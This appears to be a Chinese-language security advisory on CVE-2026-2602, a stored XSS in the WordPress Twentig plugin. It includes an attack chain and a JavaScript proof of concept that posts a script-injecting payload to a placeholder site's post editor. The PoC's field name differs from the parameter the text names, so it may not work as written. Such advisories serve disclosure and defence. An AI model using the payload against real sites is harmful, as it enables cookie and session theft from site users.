CVE-2026-2602 CVSS 6.4 中危

CVE-2026-2602 WordPress Twentig插件存储型XSS漏洞

披露日期: 2026-03-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-2602

漏洞类型

存储型跨站脚本

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Twentig Plugin

漏洞概述

WordPress插件Twentig在版本1.9.7及之前存在存储型跨站脚本漏洞。该漏洞源于'featuredImageSizeWidth'参数缺乏足够的输入清理和输出转义机制。拥有Contributor级别及以上权限的认证攻击者可利用此漏洞在页面中注入任意Web脚本。当用户访问被注入的页面时，恶意脚本将自动执行，可能导致窃取Cookie或会话劫持等风险。

技术细节

该漏洞属于存储型XSS（Stored XSS），根本原因是插件对用户输入的过滤不严。具体而言，Twentig插件在处理特色图片尺寸设置时，未对'featuredImageSizeWidth'参数进行严格的输入验证和输出编码。攻击者若具有Contributor（投稿者）权限，可以在编辑文章时向该参数注入恶意JavaScript代码。由于该参数值被直接存储在数据库中，并在页面渲染时未经转义直接输出到HTML上下文中，当管理员或其他用户浏览受影响的页面时，浏览器将解析并执行恶意脚本。CVSS 3.1向量显示 Scope Changed (S:C)，意味着攻击可能跨越安全边界，影响用户会话。

攻击链分析

STEP 1

侦察

攻击者识别目标网站安装了存在漏洞的WordPress Twentig插件（版本<=1.9.7）。

STEP 2

获取权限

攻击者注册或获取一个Contributor（投稿者）级别的账户权限。

STEP 3

注入Payload

登录后台，编辑或新建文章，在'featuredImageSizeWidth'参数中注入恶意JavaScript代码并保存。

STEP 4

触发漏洞

诱导管理员或普通用户访问被注入的文章页面，恶意脚本在受害者浏览器中执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/**
 * PoC for CVE-2026-2602
 * Description: Stored XSS in Twentig WordPress Plugin <= 1.9.7
 * Parameter: featuredImageSizeWidth
 */

// Target URL for updating post settings
const targetUrl = 'http://target-site.com/wp-admin/post.php';

// Malicious payload to be injected
const payload = '100"><script>alert(document.cookie);</script>';

// Simulate a POST request to update the post
const formData = new FormData();
formData.append('post_ID', '123'); // Replace with valid Post ID
formData.append('twentig_featured_image_size_width', payload);
formData.append('action', 'editpost');

fetch(targetUrl, {
    method: 'POST',
    body: formData,
    credentials: 'include' // Requires authenticated session
}).then(response => {
    console.log('Payload injected. Check the post page to trigger XSS.');
});

影响范围

Twentig <= 1.9.7

防御指南

临时缓解措施

如果无法立即升级插件，建议暂时禁用Twentig插件。此外，可以在服务器端部署Web应用防火墙（WAF），过滤针对featuredImageSizeWidth参数的恶意字符输入。管理员应加强对用户提交内容的审核，避免执行未经验证的脚本。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表